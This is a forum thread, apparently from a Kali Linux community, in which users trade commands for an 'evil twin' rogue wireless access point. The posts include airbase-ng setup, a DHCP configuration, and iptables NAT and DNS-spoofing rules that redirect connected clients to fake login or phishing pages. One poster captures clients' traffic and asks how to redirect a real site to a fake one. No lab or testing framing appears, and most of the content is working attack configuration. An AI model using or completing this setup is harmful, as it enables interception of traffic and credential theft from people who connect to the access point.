Results 1 to 3 of 3

Thread: Fake AP Redirect Issue.

  1. #1
    Join Date
    2013-Mar
    Posts
    2

    Fake AP Redirect Issue.

    I am tring to setup a fake AP using my WLAN which when connected to causes all browsers to redirect to my apache server, where a fake login page is setup.

    I've been struggling for a few days trying to set this up. I've not got the the stage where i can successfully create a AP using airbase and then have other clients connect to it and be given an IP address, using dhcpd3-server, not the isc-dhcp-server.

    on my machine there are two interfaces eth1 which is connected to my LAN and wlan0. i do not want any connected clients access to the internet via eth1, i only want redirection to the local apache httpd server.

    Below is the contents of my dhcpd.conf file and the two scripts which setup the AP and then configure the machine to handle DHCP requests.
    dhcpd.cong
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    The below scripts creates and AP:
    Code:
    airmon-ng check kill 
    airmon-ng start wlan0 7
    airbase-ng -e TESTER -a 6C:4C:A5:2F:6A:D1 -c 7 mon0
    This script sets up the TAP interface,dhcpd, http and mysql daemons. The script executes fine and clients can connected and receive IP addresses but they will not redirect to my apache server.
    Code:
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    touch /var/run/dhcpd.pid
    chmod 777 /var/run/dhcpd.pid
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/dhcp3-server start
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    echo 1 > /proc/sys/net/ipv4/ip_forward
    service mysql start
    service apache2 start
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 000.000.00.000:80
    Would anyone know what is causing the problem, I think its the IPTables commands.

    Thanks for any feedback.

  2. #2
    Join Date
    2013-Jul
    Posts
    844
    Do not think in anyway that we are masters of IP tables.

    This is what we used to get PwnStar9.0 to express the index.html phishing page in the targets computer using simple dnsspoof and no internet access provided. We embedded this behind an if statement as required by the program selections in Pwnstar9.0

    No internet access in provided therefore only one(1) wifi device is used
    $API=the wifi device
    This relys on dnsspoof
    The phishing pages are stored in the /var/www/ folder
    Set the permissions to allow the pages to read and write and act as a program
    You can adjust to IP as you see fit to your program



    iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p udp --dport 53 -j DNAT --to-destination 127.0.0.1
    iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p tcp --dport 53 -j DNAT --to-destination 127.0.0.1
    iptables --table nat --append POSTROUTING --out-interface $API -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT



    You also might see how we implimented the techdynamics phishing approach into kali-linux using dnsmasq


    Go here and download the program and look at the coding and help files. This approach uses mysql

    http://forum.aircrack-ng.org/index.php/topic,315.0.html


    If you find a solution we would be interested in seeing your work

    We hope this gives you a direction toward a solution.
    MTA

  3. #3
    Join Date
    2014-Dec
    Posts
    1
    Hello community!
    I need some help, I made a FakeAP, and now I need to redirect www.somesite.com to www.somefakesite.com for all connected client.


    apt-get install dhcp3-server

    dhcpd.conf
    Code:
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 192.168.1.0  netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "WIFI";
    option domain-name-servers 192.168.1.1;
    
    range 192.168.1.2 192.168.1.40;
    }

    airmon-ng start wlan0
    Kill all PID
    airbase-ng -c 11 -e WIFI mon0


    Code:
    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.65.2
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    
    
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    OK, now I have a working fakeAP, I can connect and surf on the internet with connected wireless clients and can caputre all trafic with wireshark.

    But what is the simplest way to redirect all connected client from www.somesite.com to www.somefakesite.com?
    I tried a few tutorials, but can't make it to work. Can you please help me?
    Maybe with proxy? I tried ettercap too, but as I know thats working just on lan and I need to add all clients manually to the list.

    Thank you

Similar Threads

  1. Redirect to Wrong Apt source (US-CN)
    By AlexS in forum TroubleShooting Archive
    Replies: 1
    Last Post: 2016-06-17, 01:58
  2. HTTP redirect on the fly
    By Blackhater in forum General Archive
    Replies: 0
    Last Post: 2014-03-17, 22:16

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •